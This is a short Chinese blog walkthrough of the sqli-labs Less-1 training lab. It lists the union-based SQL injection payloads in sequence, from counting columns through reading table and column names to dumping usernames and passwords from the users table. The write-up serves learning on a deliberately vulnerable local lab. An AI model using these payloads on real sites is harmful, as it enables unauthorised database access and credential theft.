SQL注入实例(sqli-labs/less-1)

魏大橙2024-05-11 13:51

初始网页

从网页可知传递的参数名为 id,并且为数字类型

1、得知数据表有多少列

1.1 使用联合查询查找列数(效率低)
sql 复制代码 
http://localhost/sqli-labs-master/Less-1/?id=1' union select 1,2 --+
1.2 使用order by查找列数(效率高)
sql 复制代码 
http://localhost/sqli-labs-master/Less-1/?id=1' order by 3 --+

2、查看回显位置

sql 复制代码 
?id=-1' union select 1,2,3 --+

3、查询当前数据库名

sql 复制代码 
?id=-1' union select 1,database(),3 --+

4、查询当前表名

sql 复制代码 
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

5、查询列名

sql 复制代码 
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--+

6、查询最终数据

sql 复制代码 
?id=-1' union select 1,group_concat(username,0x3a,password),3 from users --+

其他

查询当前数据库版本

sql 复制代码 
?id=-1' union select 1,version(),3 --+

查询当前登录用户

sql 复制代码 
?id=-1' union select 1,user(),3 --+
相关推荐
瓜牛_gn1 小时前
mysql特性
数据库·mysql
奶糖趣多多2 小时前
Redis知识点
数据库·redis·缓存
数新网络3 小时前
《深入浅出Apache Spark》系列②:Spark SQL原理精髓全解析
大数据·sql·spark
CoderIsArt3 小时前
Redis的三种模式:主从模式,哨兵与集群模式
数据库·redis·缓存
师太,答应老衲吧5 小时前
SQL实战训练之,力扣:2020. 无流量的帐户数(递归)
数据库·sql·leetcode
Channing Lewis6 小时前
salesforce case可以新建一个roll up 字段,统计出这个case下的email数量吗
数据库·salesforce
毕业设计制作和分享7 小时前
ssm《数据库系统原理》课程平台的设计与实现+vue
前端·数据库·vue.js·oracle·mybatis
ketil277 小时前
Redis - String 字符串
数据库·redis·缓存
NiNg_1_2347 小时前
高级 SQL 技巧详解
sql
Hsu_kk8 小时前
MySQL 批量删除海量数据的几种方法
数据库·mysql
热门推荐
01【HarmonyOS】HUAWEI DevEco Studio 下载地址汇总02(欧拉)openEuler系统添加网卡文件配置流程、(欧拉)openEuler系统手动配置ipv6地址流程、(欧拉)openEuler系统网络管理说明03组基轨迹建模 GBTM的介绍与实现(Stata 或 R)04【AIGC】重塑未来的科技巨轮05全面解析:构建基于深度学习的安全帽检测系统(UI界面+YOLO代码+数据集)06【经验分享】Ubuntu22.04安装微信(linux官方版)07基于YOLOv10深度学习的CT扫描图像肾结石智能检测系统【python源码+Pyqt5界面+数据集+训练代码】深度学习实战、目标检测08Ubuntu 20.04使用Livox mid 360 测试 FAST_LIO09RAG 实践- Ollama+RagFlow 部署本地知识库10红米手机使用google play